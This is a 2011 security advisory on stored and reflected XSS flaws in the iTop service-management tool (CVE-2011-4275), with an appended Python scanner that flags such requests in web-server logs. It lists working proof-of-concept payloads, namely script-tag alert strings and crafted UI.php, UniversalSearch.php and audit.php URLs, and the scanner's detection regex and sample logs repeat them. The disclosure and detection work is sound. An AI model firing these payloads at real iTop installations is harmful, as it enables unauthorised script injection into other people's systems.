| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2011-4275 | 13 Feb 2013 00:00 | – | circl |
| CVE-2011-4275 | 26 Nov 2011 02:00 | – | cve |
| CVE-2011-4275 | 26 Nov 2011 02:00 | – | cvelist |
| EUVD-2011-4217 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2011-4275 | 26 Nov 2011 03:57 | – | nvd |
| Cross site scripting | 26 Nov 2011 03:57 | – | prion |
| TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 | 27 Nov 2011 00:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 27 Nov 2011 00:00 | – | securityvulns |
| VulnCheck KEV: CVE-2011-4275 | 8 Jul 2020 00:00 | – | vulncheck_kev |
TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181
Published: 2011/11/16
Version 1.0

Affected products:
iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)
http://sourceforge.net/projects/itop/

References:
CVE-2011-4275 - Multiple web-vulnerabilities in iTop
TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt
(used for updates)

Summary:
"IT Operations Portal: a complete open source, ITIL, web based service management tool including a fully customizable CMDB, a helpdesk system and a document management tool."
Several common flaws could be found in iTop, such as reflected and stored XSS.

Vulnerable Scripts:
stored XSS:
- almost every tested input field whose value is stored in the database and rendered in the HTML content of the site. Especially where data is reformatted using JavaScript, the sanitisation in place seems to be overridden.
reflected XSS:
- almost every tested input field whose value is reflected in the server's output

Examples:
stored XSS:
- add a company named "XSS <script>alert("Help Me")</script>"
- add a database server named "XSS <script>alert("Help Me")</script>"
- import a CSV file where one cell contains "XSS <script>alert("Help Me")</script>"
- copy & paste data (which does the same as CSV import) using
1;Test 1
2;Test 2
3;Test 3<script>alert("23746234243 Test")</script>"
reflected XSS (un-authenticated):
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help Me")</script><lala="&suggest_pwd=admin
reflected XSS (authenticated):
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help Me")</script><lala="&suggest_pwd=admin
http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help Me")</script>"
http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=SearchFormToAdd_document_list&description="<script>alert("Help Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search_form&org_id=3&status=draft&type=contract
http://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C/script%3E%22&operation=errors&rule=1
http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%28949560%29%20bad%3d%22&suggest_pwd=test
http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouseover%3dprompt%28972137%29%20bad%3d%22

Possible solutions:
- use version 1.2 final

Disclosure Timeline:
2011/08/09 vendor contacted via [email protected]
2011/08/09 initial vendor response
2011/09/06 first patch by the vendor
2011/09/12 second patch by the vendor
2011/11/16 public disclosure

Credits:
Tobias Glemser ([email protected])
Tele-Consulting security networking training GmbH, Germany
www.tele-consulting.com

Disclaimer:
All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore Tele-Consulting shall not be liable for any direct or indirect damages that might be caused by using this information.
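As an added detection example (not part of the advisory or of the iTop project): a small Python scanner over web-server access-log lines that flags requests to the iTop pages named in the advisory whose query parameters, once percent-decoded, carry a tag opener or an HTML event-handler attribute, the two shapes the advisory's proof-of-concept URLs take. The log lines, client addresses and the combined-log-format regex are constructed assumptions, and the match rule is a coarse heuristic rather than an exhaustive XSS filter.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined-log-format request line (the SAMPLE_LOG below is constructed, not real traffic)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" \d{3}')

# Endpoints the advisory names as reflecting parameter values unescaped
ITOP_PAGES = ("/pages/UI.php", "/pages/UniversalSearch.php", "/pages/audit.php")

# Coarse heuristic: a tag opener, or an HTML event-handler attribute as in the prompt() PoCs.
# Deliberately broad; it will also flag odd-but-legitimate values such as "onion=".
XSS_RE = re.compile(r'<\s*/?\s*[a-z]|\bon[a-z]+\s*=', re.IGNORECASE)


def inspect_request(target: str):
    """Return (page, parameter) when a query key or value looks like injected markup, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(ITOP_PAGES):
        return None
    # keep_blank_values: a bare payload with no '=' (e.g. ?%3Cscript%3E) still arrives as a key
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once; a second unquote() catches double-encoded payloads (%253C...)
        if XSS_RE.search(unquote(key)) or XSS_RE.search(unquote(value)):
            return parts.path, key
    return None


def scan_log(lines):
    """Return one (client_ip, page, parameter) tuple per suspicious request, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line in the expected format; skip rather than crash
        finding = inspect_request(m.group("target"))
        if finding:
            hits.append((m.group("ip"), *finding))
    return hits


# Constructed sample log: three PoC-shaped requests, one ordinary search, one non-iTop request
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Nov/2011:10:12:01 +0100] "GET /iTop/pages/UI.php?auth_user=admin%22%3E%3Cscript%3Ealert(%22Help%20Me%22)%3C/script%3E%3Clala=%22&suggest_pwd=admin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Nov/2011:10:12:05 +0100] "GET /iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%28949560%29%20bad%3d%22&suggest_pwd=test HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Nov/2011:10:13:40 +0100] "GET /iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C/script%3E%22&operation=errors&rule=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [27/Nov/2011:10:15:00 +0100] "GET /iTop/pages/UI.php?operation=search_form&class=Note&name=Acunetix HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [27/Nov/2011:10:16:00 +0100] "GET /blog/?q=%3Cscript%3E HTTP/1.1" 404 300 "-" "curl/7.21"',
]
```

Running `scan_log(SAMPLE_LOG)` reports the first three requests with the page and parameter involved; a 200 response to such a request is the cue to check whether the deployed version predates the 1.2 final release the advisory recommends.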